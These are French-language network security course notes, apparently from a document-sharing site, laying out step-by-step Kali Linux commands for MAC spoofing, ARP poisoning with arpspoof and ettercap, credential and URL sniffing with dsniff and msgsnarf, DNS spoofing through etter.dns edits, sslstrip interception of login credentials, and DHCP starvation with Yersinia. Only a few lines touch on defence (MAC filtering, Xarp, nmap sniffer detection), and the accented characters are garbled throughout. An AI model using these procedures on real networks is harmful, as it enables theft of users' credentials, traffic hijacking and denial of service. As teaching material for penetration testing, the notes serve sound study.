Vous êtes sur la page 1sur 2

c) MAC SPOOFING: (ursupartion d'@MAC)

E1: mettre l'interface en mode monitoring


#iwconfig =====) permet de voir les interfaces de la machine
#airmon-ng start wlan0 =====) permet de monitoriser la carte wlan0
#kill "PID" ====) tuer les processus pour ne pas qu'ils nous emp�chent de faire
notre monitoring
#airodump-ng wlan0mon ====) permet de voir les diff�rents points d'acc�s et les
machines connect�es
#airmon-ng stop wlan0mon=====) stoper le mode monitoring pour revenir en wlan0
E2: changer l'@MAC
#sudo macchanger -m @MACcible wlan0 =====) permet de changer temporainement
l'adresse d'une carte r�seau (wlan0 ou eth0 ou L0) sous linux, cela suppose que
nous ne sommes pas en mode monitoring sinon cela ne va pas passer.
sous windows utiliser l'outil SMAC
solutions: filtrage d'@MAC

d) ARP POISONNING OU ARP SPOOFING : cette technique permet de falsifier l'@MAC


d'une machine cible et l'associ�e � notre @IP afin de l'envoyer � l'�metteur
#echo 1 > /proc/sys/net/ipv4/ip_forward====) redirection de flux
#arpspoof -t @IP (router ou switch) @IPcible ======) ARP POISONING (MITM attack
between the target and the network)

NB:
* outils windows permettant de d�tecter une personne faisant du sniffing : Xarp

* sous kali : #nmap --script=sniffer-detect @IPcible/plage d'@IP (192.168.1.0/24)


devant Promiscuous mode @IP :
*(11111111)===) verifier (la personne fait du sniffing)
*(--------)===) non v�rifier (personne ne le fait)

>arp -a ====) permet de visualiser le cache ARP


>ipconfig/displaydns===) permet de visualiser le cache dns

OUTILS SOUS KALI POUR FAIRE MITM attack: ETTERCAP


ETAPE 1
#ettercap -G===)sniff===)unified sniffing===)valider===)hosts===)host list===)scan
for host====)s�lectionner sur la passerelle===)add to target 1===)@IPcible===)Add
to target 2====)start====)start sniffing (mitm==)cochez "sniff remote
connections"===)valider====)start===)start sniffing
NB: ouvrir Wireshark pour observer

ETAPE 2
COMMANDES POUR VOIR CE QUE FAIRE L'UTILISATEUR:
#urlsnarf ====) permet de montrer les pages visit�es (http, https,...)
#driftnet -i eth0 ====) orient� image (affiche les images que l'utilisateur visite)
#dsniff ====)capture les url tap�s par l'utilisateur sur les sites non s�curis�s
#msgsnarf ===) affiche les IDs de l'utilisateur (username et password) sur les
sites non s�curis�s

e) DNS POISONNING : cette technique permet � l'attaquant de remplir le cache DNS de


fausses @IP et un nom de domaine. une fois que la fausse @IP est associ�e au nom de
domaine et mis dans le cache, l'utilisateur sera orient� vers une fausse page web
en cas de demande de nom de domaine:
#echo 1 > /proc/sys/net/ipv4/ip_forward =====) redirection de flux
#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port
8080
#ettercap -G ===) suivre les m�mes �tapes====) plugins===)manage the
plugins===)DNS_spoof (double click)
#gedit /etc/ettercap/
#gedit /etc/ettercap/etter.conf
fichier � modifier :

* [Privs]
ec_uid=0
ec_gid=0
*linux
en dessous de "if you use iptables", enlevez "#" devant les commandes
(redir_command on et redir_command off)
#gedit /etc/ettercap/etter.dns
mettre le site sur lequel sera redirig� notre cible. juste en bas de "redirect it
to www.linux.org"

f) SSLSTRIP : bas� sur le traffic SSL (pas si s�curis�) permet de faire


l'interception et le d�cryptage des identifiants d'une session. il devient un MiTM
proxy

#echo 1 > /proc/sys/net/ipv4/ip_forward


#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port
8080
#sslstrip -l 8080
allez sur un site pour se connecter par exemple linked'in (username et password) et
il va intercepter la session crypt�e et le d�crypter
#gedit sslstrip.log
ctrl + F : pour rechercher les identifiants intercept�s

g) DHCP Starvation : famine du DHCP): l'outil utilis� est Yersinia sous kali. pour
le mettre en mode graphique, tapez :
#yersinia -G====)launch attack===)DHCP====)cochez sending Discover packet===)ok ou
utiliser DHCPSTARV

NB: apr�s avoir cliquez sur "ok" automatiquement cette attaque va envoyer plusieurs
requ�tes de DHCP (DISCOVERY) au router, cr�ant ainsi un dos au router. Par
consequent, les utilisateurs ne recevront plus d'@IP. en effet, cette technique
permet d'emp�cher � d'autres utilisateurs d'avoir acc�s au r�seau par DHCP

Vous aimerez peut-être aussi